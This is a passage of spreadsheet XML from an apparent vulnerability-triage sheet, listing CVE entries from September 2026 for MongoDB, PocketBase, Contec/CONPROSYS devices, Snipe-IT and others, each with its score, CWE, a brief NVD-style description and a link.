      <c r="D261" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled resource consumption weakness exists in the request-handling path of the MongoDB sharded-cluster router process. A client that has network access to a router port and has not authenticated can supply connection-monitoring parameters that cause the server to expend CPU resources without any rate limiting, degrading or denying service to legitimate clients. No authentication, elevated privileges, or user interaction is required. Only availability is affected; data confidentiality and integrity are not impacted.</t>
        </is>
      </c>
      <c r="S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82410</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>Pocketbase is an open source web backend written in go. Prior to 0.22.48 and 0.39.7, PocketBase's panic-recovery middleware covers regular request handling but not internal child and worker goroutines. A panic in one of these internal goroutines can escape recovery and terminate the server process, causing a denial of service. The remediation introduces routine.SafeWrap to convert recovered panics into regular errors and applies it to the affected internal worker functions. This issue is fixed in versions 0.22.48 and 0.39.7.</t>
        </is>
      </c>
      <c r="S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82410</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82762</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in Contec FX5000 series, FX4000 series, and FX3000 series. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82762</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82766</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in SGA1000. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82766</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82770</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow vulnerability exists in Contec RP-WAH-SR Series. If a remote attacker sends a specially crafted request to the product's web service, an arbitrary program may be executed.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82770</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82772</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow vulnerability exists in Contec EC1000 series. If a remote attacker sends a specially crafted request to the product's web service, an arbitrary program may be executed.</t>
        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82772</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82774</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in CONPROSYS M2M Gateway Series and CONPROSYS M2M Controller Series. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82774</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82777</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in CONPROSYS PAC Series. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82777</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82779</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in CONPROSYS TM Series. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82779</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82780</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>Unrestricted upload of file with dangerous type issue exists in CONPROSYS TM Series. If a specially crafted file is uploaded by a remote authenticated attacker, an arbitrary command may be executed on the product.</t>
        </is>
      </c>
      <c r="S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82780</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82787</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability exists in CPSL-08P1EN. If this vulnerability is exploited, an affected product may be operated by a remote attacker without authentication.</t>
        </is>
      </c>
      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82787</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82789</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>An improper neutralization of directives in dynamically evaluated code ('Eval Injection') issue exists in CONPROSYS HMI System(CHS). If exploited, arbitrary code may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82789</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82791</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in Contec CAN 2.0B Communication Wireless LAN / USB Converter Unit. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82791</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82794</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>SolarView Compact contains an OS command Injection vulnerability in in Schedule Settings. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82794</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84408</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>QND contains an improper access control vulnerability in a named pipe, which may allow a local attacker who is logged in to a Windows PC where the affected product's client is installed to execute arbitrary commands with SYSTEM privileges.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84408</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85617</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.6.3 contain an authorization bypass vulnerability in the bulk delete functionality that allows restricted users to soft-delete users outside their authorized scope. Attackers can include unauthorized user IDs in bulk delete requests to bypass instance-level restrictions and modify or disable accounts they should not access.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85617</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86106</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated actor with network access to the private HA interconnect may trigger sensitive HA peer functions without verification. This could result in elevated command execution on Edge units where HA is enabled.</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86106</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86831</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
